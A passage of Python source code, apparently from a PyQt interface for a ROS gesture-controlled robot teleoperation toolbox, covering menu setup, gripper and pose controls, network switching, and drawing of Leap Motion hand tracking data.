inputPlotPosesAction.triggered.connect(self.thread_inputPlotPosesAction)\n\n ## Add actions to the menu\n viewMenu.addAction(viewOptionsAction)\n viewMenu.addAction(viewMoveOptionsAction)\n viewMenu.addAction(viewPlotWindowAction)\n pageMenu.addAction(viewGoToInfoAction)\n pageMenu.addAction(viewGoToControlAction)\n pageMenu.addAction(viewGoToMoveAction)\n configMenu.addMenu(impMenu)\n configMenu.addMenu(impMenu2)\n configMenu.addAction(print_path_trace_action)\n testingMenu.addAction(tableTestAction)\n testingMenu.addAction(initTestAction)\n testingMenu.addAction(inputTestAction)\n testingMenu.addAction(inputPlotJointsAction)\n testingMenu.addAction(inputPlotPosesAction)\n testingMenu.addAction(self.confusion_mat_action)\n leapmotionMenu.addAction(record_with_keys_action)\n leapmotionMenu.addMenu(self.network_menu)\n leapmotionMenu.addAction(download_networks_action)\n\n thread = Thread(target = self.play_method)\n thread.start()\n\n self.setGeometry(app_data_loaded['WindowXY'][0],app_data_loaded['WindowXY'][1], app_data_loaded['WindowSize'][0], app_data_loaded['WindowSize'][1])\n self.setWindowTitle('Interface')\n self.show()\n\n ''' Initialize Visible Objects Array\n - AllVisibleObjects array specifies each object a specific view_group\n - Object visibility management across application\n '''\n self.AllVisibleObjects = []\n self.AllVisibleObjects.append(ObjectQt('lblStatus',self.lblStatus,0,view_group=['MoveViewState']))\n for n,obj in enumerate(self.lblRightPanelNamesObj):\n self.AllVisibleObjects.append(ObjectQt('lblRightPanelNamesObj'+str(n),obj,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl1',self.lbl1,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl2',self.lbl2,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl3',self.lbl3,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lbl4',self.lbl4,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('lblInfo',self.lbl2,0,view_group=['GesturesViewState']))\n self.AllVisibleObjects.append(ObjectQt('comboPlayNLive',self.comboPlayNLive,0,view_group=['MoveViewState']))\n\n self.AllVisibleObjects.append(ObjectQt('comboPickPlayTraj',self.comboPickPlayTraj,0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove' ,self.btnPlayMove, 0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove2',self.btnPlayMove2,0,view_group=['MoveViewState', 'play']))\n self.AllVisibleObjects.append(ObjectQt('btnPlayMove3',self.btnPlayMove3,0,view_group=['MoveViewState', 'play']))\n\n self.AllVisibleObjects.append(ObjectQt('comboLiveMode',self.comboLiveMode,0,view_group=['MoveViewState', 'live']))\n self.AllVisibleObjects.append(ObjectQt('comboInteractiveSceneChanges',self.comboInteractiveSceneChanges,0,view_group=['MoveViewState', 'live']))\n\n self.AllVisibleObjects.append(ObjectQt('btnRecordActivate',self.btnRecordActivate,0,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('btnPlotActivate',self.btnPlotActivate,0,view_group=['MoveViewState', 'PlotterWindow']))\n self.AllVisibleObjects.append(ObjectQt('btnExportDataActivate',self.btnExportDataActivate,0,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('btnDeletePlotActivate',self.btnDeletePlotActivate,0,view_group=['MoveViewState', 'PlotterWindow']))\n\n for n,obj in enumerate(self.lblConfNamesObj):\n self.AllVisibleObjects.append(ObjectQt('lblConfNamesObj'+str(n),obj,1,view_group=['MoveViewState']))\n for n,obj in enumerate(self.lblConfValuesObj):\n self.AllVisibleObjects.append(ObjectQt('lblConfValuesObj'+str(n),obj,1,view_group=['MoveViewState']))\n for n,obj in enumerate(self.movePageGoPoseLabels):\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseLabels'+str(n),obj,2,view_group=['MoveViewState']))\n for n,obj in enumerate(self.movePageGoPoseEdits):\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseEdits'+str(n),obj,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageGoPoseButton',self.movePageGoPoseButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageGoGripperButton',self.movePageGoGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageOpenGripperButton',self.movePageOpenGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageCloseGripperButton',self.movePageCloseGripperButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageRobotResetButton',self.movePageRobotResetButton,2,view_group=['MoveViewState']))\n\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvAboveButton',self.movePageUseEnvAboveButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvWallButton',self.movePageUseEnvWallButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePageUseEnvTableButton',self.movePageUseEnvTableButton,2,view_group=['MoveViewState']))\n self.AllVisibleObjects.append(ObjectQt('movePagePoseNowButton',self.movePagePoseNowButton,2,view_group=['MoveViewState']))\n\n self.setMouseTracking(True)\n self.mousex, self.mousey = 0.,0.\n self.updateLeftRightPanel(rightPanelNames=['r conf.', 'l conf.'])\n print(\"[Interface] Done\")\n\n self.plot_window = None\n\n # Various\n self.paint_sequence = 0\n\n def togglePlotWindow(self, state):\n if state:\n self.PlotterWindow = True\n self.plot_window = AnotherWindowPlot()\n self.plot_window.show()\n self.plot_window.set_n_series(gl.gd.l.dynamic.info.n)\n else:\n self.PlotterWindow = False\n self.plot_window = None\n\n def updateLeftRightPanel(self, leftPanelNames=None, rightPanelNames=None):\n ''' Update names on left or right panel\n '''\n if rightPanelNames:\n for i in range(len(rightPanelNames)):\n obj = self.lblRightPanelNamesObj[i]\n obj.setText(rightPanelNames[i])\n if leftPanelNames:\n for i in range(len(leftPanelNames)):\n obj = self.lblLeftPanelNamesObj[i]\n obj.setText(leftPanelNames[i])\n\n def getRightPanelValues(self):\n ''' Get values for Right panel values\n '''\n values = []\n values.append(round(ml.md.frames[-1].r.confidence,2))\n values.append(round(ml.md.frames[-1].l.confidence,2))\n return values\n\n def getRightPanelActivates(self):\n activates = []\n activates.append(ml.md.frames[-1].r.confidence > settings.yaml_config_gestures['min_confidence'])\n activates.append(ml.md.frames[-1].l.confidence > settings.yaml_config_gestures['min_confidence'])\n return activates\n\n def mouseMoveEvent(self, event):\n self.mousex, self.mousey = event.x(), event.y()\n\n def go_to_pose_button(self):\n ''' Takes the text inputs given by user and change robot goal_pose\n '''\n vals = []\n for obj in self.movePageGoPoseEdits[0:7]:\n val = None\n try:\n val = float(obj.text())\n except:\n print(\"[ERROR*] Value Error!\")\n val = 0.0\n vals.append(val)\n pose = Pose()\n pose.position = Point(*vals[0:3])\n pose.orientation = Quaternion(*vals[3:7])\n ml.md.goal_pose = pose\n ml.md.m.go_to_pose(pose)\n\n def actuate_gripper_button(self):\n ''' Takes text input float and control gripper position\n '''\n val = None\n try:\n val = float(self.movePageGoPoseEdits[7].text())\n except:\n print(\"[ERROR*] Value Error!\")\n val = 0.0\n ml.md.m.set_gripper(val, effort=0.04, eef_rot=-1, action=\"\", object=\"\")\n\n def open_gripper_button(self):\n ml.md.m.set_gripper(1.0, action=\"release\")\n\n def close_gripper_button(self):\n ml.md.m.set_gripper(0.0)\n\n def robot_reset_button(self):\n '''pose = Pose()\n pose.orientation.x = np.sqrt(2)/2\n pose.orientation.y = np.sqrt(2)/2\n pose.position.x = 0.5\n pose.position.z = 0.2\n ml.md.m.go_to_pose(pose)'''\n ml.md.m.reset()\n\n def keyPressEvent(self, event):\n ''' Callbacky for every keyboard button press\n '''\n if settings.record_with_keys:\n KEYS = [self.mapQtKey(key) for key in gl.gd.GsExt_keys]\n if event.key() in KEYS:\n self.recording = True\n for n, key in enumerate(KEYS):\n if event.key() == key:\n self.dir_queue.append(gl.gd.GsExt[n])\n self.caller = RepeatableTimer(self.REC_TIME, self.save_data, ())\n self.caller.start()\n else:\n print(\"[Interface] Key have been read, but recording is not activated!\")\n event.accept()\n\n\n def changeNetwork(self, network, type='static'):\n ''' ROS service send request about network change\n '''\n\n rospy.wait_for_service(f'/teleop_gesture_toolbox/change_{type}_network')\n try:\n change_network = rospy.ServiceProxy(f'/teleop_gesture_toolbox/change_{type}_network', ChangeNetwork)\n response = change_network(data=network)\n Gs = [g.lower() for g in response.Gs]\n settings.args = response.args\n print(\"[UI] Gestures & Network changed, new set of gestures: \"+str(\", \".join(Gs)))\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n settings.paths.gesture_network_file = network\n\n gl.gd.gesture_change_srv(local_data=response)\n\n def download_networks_gdrive(self):\n ''' Downloads all networks from google drive\n 1. Files download\n 2. Network info update\n '''\n gl.gd.download_networks_gdrive()\n # Update Networks Menu\n self.network_menu.clear()\n self.networks = gl.gd.get_networks()\n self.network_actions = []\n for network in self.networks:\n action = QAction(network, self)\n action.triggered.connect(\n lambda checked, network=network: self.changeNetwork(network))\n self.network_menu.addAction(action)\n self.network_actions.append(action)\n\n time.sleep(1)\n\n def confustion_mat(self, e):\n thread = Thread(target = self.confustion_mat_)\n thread.start()\n def button_play_move(self, e):\n self.play_status = 1\n def button_play_move2(self, e):\n self.play_status = -1\n def button_play_move3(self, e):\n self.play_status = 0\n\n def save_data(self):\n ''' Saving record data in this thread will be outdated, ROS service will be created\n '''\n rospy.wait_for_service('save_hand_record')\n try:\n save_hand_record = rospy.ServiceProxy('save_hand_record', SaveHandRecord)\n resp1 = save_hand_record(directory=settings.paths.learn_path+self.dir_queue.pop(0), save_method='numpy', recording_length=1.0)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n self.recording = False\n\n def play_method(self):\n while True:\n time.sleep(0.1)\n ml.md.HoldValue += self.play_status\n if self.play_status == 1 and ml.md.HoldValue > 100:\n ml.md.HoldValue = 99\n self.play_status = 0\n if self.play_status == -1 and ml.md.HoldValue < 0:\n ml.md.HoldValue = 1\n self.play_status = 0\n\n\n def confustion_mat_(self):\n self.lblInfo.setText(\"Show gesture disp. here\")\n time.sleep(5)\n NUM_SAMPLES = 5\n DELAY_BETW_SAMPLES = 0.5\n y_true = []\n y_pred = []\n\n gl.gd.r.static.names\n static_gestures_list = gl.gd.r.static.names()\n for n, i in enumerate(static_gestures_list):\n for j in range(0,NUM_SAMPLES):\n self.lblInfo.setText(i+\" \"+str(j))\n time.sleep(DELAY_BETW_SAMPLES)\n for m,g in enumerate(static_gestures_list):\n if gl.gd.r.poses[m].toggle:\n y_true.append(n)\n y_pred.append(m)\n\n self.lblInfo.setText(\"Done (Saved as confusionmatrix.csv)\")\n cm = confusion_matrix(y_true, y_pred)\n cm_ = np.vstack((static_gestures_list,cm))\n static_gestures_list.insert(0,\"Confusion matrix\")\n cm__ = np.hstack((np.array([static_gestures_list]).transpose(),cm_))\n with open('confusionmatrix.csv', 'w') as file:\n writer = csv.writer(file)\n writer.writerows(cm__)\n\n\n\n def toggleViewGesturesMenu(self, state):\n self.GesturesViewState = state\n def toggleViewMoveMenu(self, state):\n self.MoveViewState = state\n def goToInfo(self):\n settings.WindowState = 0\n def goToConfig(self):\n settings.WindowState = 1\n def goToMove(self):\n settings.WindowState = 2\n\n def gestures_goal_init_procedure(self):\n ml.md.gestures_goal_pose.position = ml.md.ENV['start']\n ml.md.gestures_goal_pose.orientation = ml.md.ENV['ori']\n ml.md.goal_pose.position = ml.md.ENV['start']\n ml.md.goal_pose.orientation = ml.md.ENV['ori']\n\n # Switch the environment functions\n def switchEnvAbove(self):\n ml.md.ENV = ml.md.ENV_DAT['above']\n self.gestures_goal_init_procedure()\n def switchEnvWall(self):\n ml.md.ENV = ml.md.ENV_DAT['wall']\n self.gestures_goal_init_procedure()\n def switchEnvTable(self):\n ml.md.ENV = ml.md.ENV_DAT['table']\n self.gestures_goal_init_procedure()\n\n def movePageUseEnvAboveButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['above']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['above']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['above']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['above']['ori'].w))\n def movePageUseEnvWallButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['wall']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['wall']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['wall']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['wall']['ori'].w))\n def movePageUseEnvTableButtonFun(self):\n self.movePageGoPoseEdits[3].setText(str(ml.md.ENV_DAT['table']['ori'].x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.ENV_DAT['table']['ori'].y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.ENV_DAT['table']['ori'].z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.ENV_DAT['table']['ori'].w))\n def movePagePoseNowButtonFun(self):\n self.movePageGoPoseEdits[0].setText(str(ml.md.goal_pose.position.x))\n self.movePageGoPoseEdits[1].setText(str(ml.md.goal_pose.position.y))\n self.movePageGoPoseEdits[2].setText(str(ml.md.goal_pose.position.z))\n\n self.movePageGoPoseEdits[3].setText(str(ml.md.goal_pose.orientation.x))\n self.movePageGoPoseEdits[4].setText(str(ml.md.goal_pose.orientation.y))\n self.movePageGoPoseEdits[5].setText(str(ml.md.goal_pose.orientation.z))\n self.movePageGoPoseEdits[6].setText(str(ml.md.goal_pose.orientation.w))\n\n # Fixed orientation function\n def fixedOriAct(self, state):\n settings.ORIENTATION_MODE = 'fixed' if state else 'free'\n def print_path_trace(self, state):\n settings.print_path_trace = state\n def record_with_keys(self, state):\n if not state: state = True\n settings.record_with_keys = state\n\n def update_plot_with_vars(self):\n self.plot_window.update_plot()\n\n def export_plot_data(self):\n gl.gd.export()\n print(\"[UI] Plot data exported!\")\n\n def delete_plot_data(self):\n ml.md.frames.clear()\n gl.gd.l.dynamic.data_queue.clear()\n gl.gd.r.dynamic.data_queue.clear()\n gl.gd.l.static.data_queue.clear()\n gl.gd.r.static.data_queue.clear()\n self.plot_window.canvas.axes2.cla()\n print(\"[UI] All data deleted!\")\n\n def goScene(self, index):\n scenes = sl.scenes.names()\n sl.scenes.make_scene(ml.md.m, scenes[index])\n\n def onComboPlayNLiveChanged(self, text):\n if text==\"Live hand\":\n ml.md.mode = 'live'\n elif text==\"Play path\":\n ml.md.mode = 'play'\n elif text==\"Gesture based\":\n ml.md.mode = 'gesture'\n def onComboPickPlayTrajChanged(self, text):\n ml.md.changePlayPath(text)\n def onComboLiveModeChanged(self, text):\n ml.md.changeLiveMode(text)\n def onInteractiveSceneChanged(self, text):\n if text == \"Scene 1 Drawer\":\n sl.scenes.make_scene(ml.md.m, 'drawer')\n ml.md.ENV = ml.md.ENV_DAT['wall']\n elif text == \"Scene 2 Pick/Place\":\n sl.scenes.make_scene('pickplace')\n ml.md.ENV = ml.md.ENV_DAT['table']\n elif text == \"Scene 3 Push button\":\n sl.scenes.make_scene('pushbutton')\n ml.md.ENV = ml.md.ENV_DAT['table']\n elif text == \"Scene 4 - 2 Pick/Place\":\n sl.scenes.make_scene('pickplace2')\n ml.md.ENV = ml.md.ENV_DAT['table']\n else: raise Exception(\"Item not on a list!\")\n self.gestures_goal_init_procedure()\n\n def paintEvent(self, e):\n ## Window Resolution update\n self.w = settings.w = self.size().width()\n self.h = settings.h = self.size().height()\n\n '''\n if self.paint_sequence % 50 == 0:\n self.update_plot_with_vars()\n self.paint_sequence += 1\n '''\n ## Set all objects on page visible (the rest set invisible)\n for obj in self.AllVisibleObjects:\n # Every object that belongs to that group are conditioned by that group\n if obj.page == settings.WindowState and \\\n (self.GesturesViewState if 'GesturesViewState' in obj.view_group else True) and \\\n (self.MoveViewState if 'MoveViewState' in obj.view_group else True) and \\\n (self.PlotterWindow if 'PlotterWindow' in obj.view_group else True) and \\\n ((ml.md.mode=='live') if 'live' in obj.view_group else True) and \\\n ((ml.md.mode=='play') if 'play' in obj.view_group else True) and \\\n ((ml.md.mode=='gesture') if 'gesture' in obj.view_group else True):\n obj.qt.setVisible(True)\n else:\n obj.qt.setVisible(False)\n\n ## Point given window\n if settings.WindowState == 0:\n self.mainPage(e)\n if settings.WindowState == 1:\n self.configPage(e)\n if settings.WindowState == 2:\n self.movePage(e)\n\n\n QMainWindow.paintEvent(self, e)\n painter = QPainter(self)\n painter.setPen(QPen(Qt.red, 3))\n\n for h in ['l', 'r']:\n if getattr(ml.md, h+'_present')():\n pts = len(ml.md.frames)\n if pts > 10: pts = 10\n for n in range(1,pts):\n #if ml.md.frames[-n-1].l.visible and ml.md.frames[-n].l.visible:\n if getattr(ml.md.frames[-n-1], h).visible and getattr(ml.md.frames[-n], h).visible:\n #p1 = tfm.transformLeapToUIsimple(ml.md.frames[-n].l.palm_pose())\n p1 = tfm.transformLeapToUIsimple(getattr(ml.md.frames[-n], h).palm_pose())\n #p2 = tfm.transformLeapToUIsimple(ml.md.frames[-n-1].l.palm_pose())\n p2 = tfm.transformLeapToUIsimple(getattr(ml.md.frames[-n-1], h).palm_pose())\n if is_hand_inside_ball(getattr(ml.md.frames[-n], h)):\n painter.setPen(QPen(Qt.green, p1.position.z))\n painter.drawLine(p1.position.x, p1.position.y, p2.position.x, p2.position.y)\n else:\n painter.setPen(QPen(Qt.red, 1))\n painter.drawLine(p1.position.x-10, p1.position.y-10, p2.position.x+10, p2.position.y+10)\n painter.drawLine(p1.position.x-10, p1.position.y+10, p2.position.x+10, p2.position.y-10)\n\n if gl.gd.r.static[-1] and self.cursor_enabled() and 'point' in gl.gd.r.static.info.names:\n pose_c = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x_c,y_c = pose_c.position.x, pose_c.position.y\n\n rad = gl.gd.r.static[-1].point.time_visible*80\n if rad > 100:\n rad = 100\n\n painter.setPen(QPen(Qt.yellow, 4))\n painter.drawEllipse(x_c-rad/2,y_c-rad/2, rad, rad)\n\n #painter.setPen(QPen(Qt.black, 1))\n #painter.drawLine(self.w/2,self.h-20, self.w-RIGHT_MARGIN-ICON_SIZE, self.h-20)\n #painter.drawLine(self.w/2,self.h-20, self.w/2, TOP_MARGIN+ICON_SIZE)\n #self.lblStartAxis.setGeometry(self.w/2+5, self.h-70, 100, 50)\n #self.lblStartAxis.setText(str(ml.md.ENV['start']))\n\n\n\n ''' Draw the bone structure '''\n for h in ['l', 'r']:\n painter.setPen(QPen(Qt.black, 2))\n #if ml.md.r_present():\n if getattr(ml.md, h+'_present')():\n hand = getattr(ml.md.frames[-1], h)\n palm = hand.palm_position()\n wrist = hand.wrist_position()\n\n elbow = hand.elbow_position()\n pose_palm = Pose()\n pose_palm.position = Point(palm[0], palm[1], palm[2])\n pose_wrist = Pose()\n pose_wrist.position = Point(wrist[0], wrist[1], wrist[2])\n pose_elbow = Pose()\n pose_elbow.position = Point(elbow[0], elbow[1], elbow[2])\n pose_palm_ = tfm.transformLeapToUIsimple(pose_palm)\n pose_wrist_ = tfm.transformLeapToUIsimple(pose_wrist)\n x, y = pose_palm_.position.x, pose_palm_.position.y\n x_, y_ = pose_wrist_.position.x, pose_wrist_.position.y\n painter.drawLine(x, y, x_, y_)\n pose_elbow_ = tfm.transformLeapToUIsimple(pose_elbow)\n x, y = pose_elbow_.position.x, pose_elbow_.position.y\n painter.drawLine(x, y, x_, y_)\n\n if h == 'l':\n ''' Set builder mode '''\n nBuild_modes = len(ml.md.build_modes)\n id_build_mode = ml.md.build_modes.index(ml.md.build_mode)\n painter.setPen(QPen(Qt.blue, 4))\n for n, i in enumerate(ml.md.build_modes):\n x_bm, y_bm = point_by_ratio((x, y),(x_, y_), 0.5+0.5*(n/nBuild_modes))\n\n if n == id_build_mode:\n painter.setBrush(QBrush(Qt.blue, Qt.SolidPattern))\n else:\n painter.setBrush(QBrush(Qt.blue, Qt.NoBrush))\n painter.drawEllipse(x+x_bm-5, y+y_bm-5, 10, 10)\n\n painter.setPen(QPen(Qt.black, 2))\n\n for finger in hand.fingers:\n for b in range(0, 4):\n bone = finger.bones[b]\n pose_bone_prev = Pose()\n pose_bone_prev.position = Point(bone.prev_joint[0], bone.prev_joint[1], bone.prev_joint[2])\n pose_bone_next = Pose()\n pose_bone_next.position = Point(bone.next_joint[0], bone.next_joint[1], bone.next_joint[2])\n pose_bone_prev_ = tfm.transformLeapToUIsimple(pose_bone_prev)\n pose_bone_next_ = tfm.transformLeapToUIsimple(pose_bone_next)\n x, y = pose_bone_prev_.position.x, pose_bone_prev_.position.y\n x_, y_ = pose_bone_next_.position.x, pose_bone_next_.position.y\n painter.drawLine(x, y, x_, y_)\n\n\n def movePage(self, e):\n pass\n\n def mainPage(self, e):\n w = self.w\n h = self.h\n qp = QPainter()\n qp.begin(self)\n textStatus = \"\"\n if ml.md.goal_pose and ml.md.goal_joints:\n structures_str = [structure.object_stack for structure in ml.md.structures]\n textStatus += f\"eef: {str(round(ml.md.eef_pose.position.x,2))} {str(round(ml.md.eef_pose.position.y,2))} {str(round(ml.md.eef_pose.position.z,2))}\\ng p: {str(round(ml.md.goal_pose.position.x,2))} {str(round(ml.md.goal_pose.position.y,2))} {str(round(ml.md.goal_pose.position.z,2))}\\ng q:{str(round(ml.md.goal_pose.orientation.x,2))} {str(round(ml.md.goal_pose.orientation.y,2))} {str(round(ml.md.goal_pose.orientation.z,2))} {str(round(ml.md.goal_pose.orientation.w,2))}\\nAttached: {ml.md.attached}\\nbuild_mode {ml.md.build_mode}\\nobject_touch and focus_id {ml.md.object_focus_id} {ml.md.object_focus_id}\\nStructures: {str(structures_str)}\"\n\n if self.recording:\n qp.setBrush(QBrush(Qt.red, Qt.SolidPattern))\n qp.drawEllipse(LEFT_MARGIN+130+ICON_SIZE*2, h-10-ICON_SIZE, ICON_SIZE/2,ICON_SIZE/2)\n qp.setBrush(QBrush(Qt.black, Qt.NoBrush))\n self.lblInfo.setGeometry(LEFT_MARGIN+130, h-ICON_SIZE,ICON_SIZE*5,ICON_SIZE)\n self.lblStatus.setText(textStatus)\n\n self.lbl3.setText(\"Det.: \"+settings.get_hand_mode()['l'])\n self.lbl4.setText(\"Det.: \"+settings.get_hand_mode()['r'])\n\n self.lbl2.move(self.size().width()-RIGHT_MARGIN-40, 36)\n self.lbl4.move(self.size().width()-RIGHT_MARGIN-40, TOP_MARGIN_GESTURES-30)\n\n if self.GesturesViewState:\n # up late\n if ml.md.frames:\n qp.drawLine(LEFT_MARGIN, TOP_MARGIN+(1)*ICON_SIZE+5,\n LEFT_MARGIN+2*ICON_SIZE+2, TOP_MARGIN+(1)*ICON_SIZE+5)\n # hand fingers\n n = 0\n if ml.md.frames[-1].l.confidence > settings.yaml_config_gestures['min_confidence']:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(n+1)*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN+(n+1)*ICON_SIZE-round(ml.md.frames[-1].l.confidence,2)*ICON_SIZE))\n for i in range(0,5):\n if ml.md.frames[-1].l.oc_activates[i]:\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"open_left.png\"))\n else:\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"closed_left.png\"))\n\n qp.drawLine(w-RIGHT_MARGIN-ICON_SIZE, TOP_MARGIN+(1)*ICON_SIZE+5, w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(1)*ICON_SIZE+5)\n if ml.md.frames[-1].r.confidence > settings.yaml_config_gestures['min_confidence']:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(n+1)*ICON_SIZE, w-RIGHT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN+(n+1)*ICON_SIZE-round(ml.md.frames[-1].r.confidence,2)*ICON_SIZE))\n for i in range(0,5):\n if ml.md.frames[-1].r.oc_activates[i]:\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"open.png\"))\n else:\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"closed.png\"))\n\n ''' Direction of hand '''\n for h, X in [('l', LEFT_MARGIN+ICON_SIZE), ('r', w-RIGHT_MARGIN-ICON_SIZE)]:\n point_direction = getattr(ml.md.frames[-1], h).point_direction()\n if point_direction[0] < 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_right.png\"))\n if point_direction[0] > 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_left.png\"))\n if point_direction[1] < 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_up.png\"))\n if point_direction[1] > 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_down.png\"))\n\n ''' Left side lane - Gestures '''\n static_gs_file_images = gl.gd.static_info().filenames\n static_gs_names = gl.gd.static_info().names\n dynamic_gs_file_images = gl.gd.dynamic_info().filenames\n dynamic_gs_names = gl.gd.dynamic_info().names\n for n, i in enumerate(static_gs_file_images):\n image_filename = settings.paths.graphics_path+i\n image_filename = f\"{image_filename[:-4]}_left{image_filename[-4:]}\"\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(image_filename))\n\n if gl.gd.l.static.relevant():\n for n, i in enumerate(static_gs_file_images):\n\n if gl.gd.l.static[-1][n].activated:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-gl.gd.l.static[-1][n].probability*ICON_SIZE))\n qp.drawText(LEFT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, static_gs_names[n])\n '''\n if gl.gd.r.static.relevant():\n for n, i in enumerate(static_gs_file_images):\n image_filename = settings.paths.graphics_path+i\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(image_filename))\n\n if gl.gd.r.static[-1][n].activated:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, w-RIGHT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-gl.gd.r.static[-1][n].probability*ICON_SIZE))\n qp.drawText(w-RIGHT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, static_gs_names[n])\n '''\n '''\n for n, i in enumerate(dynamic_gs_file_images):\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+i))\n\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n probabilities = gl.gd.r.dynamic[-1].probabilities_norm\n for n, i in enumerate(dynamic_gs_file_images):\n\n\n if gl.gd.r.dynamic[-1][n].activated:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1+len(static_gs_file_images))*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1+len(static_gs_file_images))*ICON_SIZE-probabilities[n]*ICON_SIZE)\n qp.drawText(LEFT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE+10, dynamic_gs_names[n])\n '''\n for n, i in enumerate(dynamic_gs_file_images):\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+i))\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n probabilities = gl.gd.r.dynamic[-1].probabilities_norm\n for n, i in enumerate(dynamic_gs_file_images):\n\n if 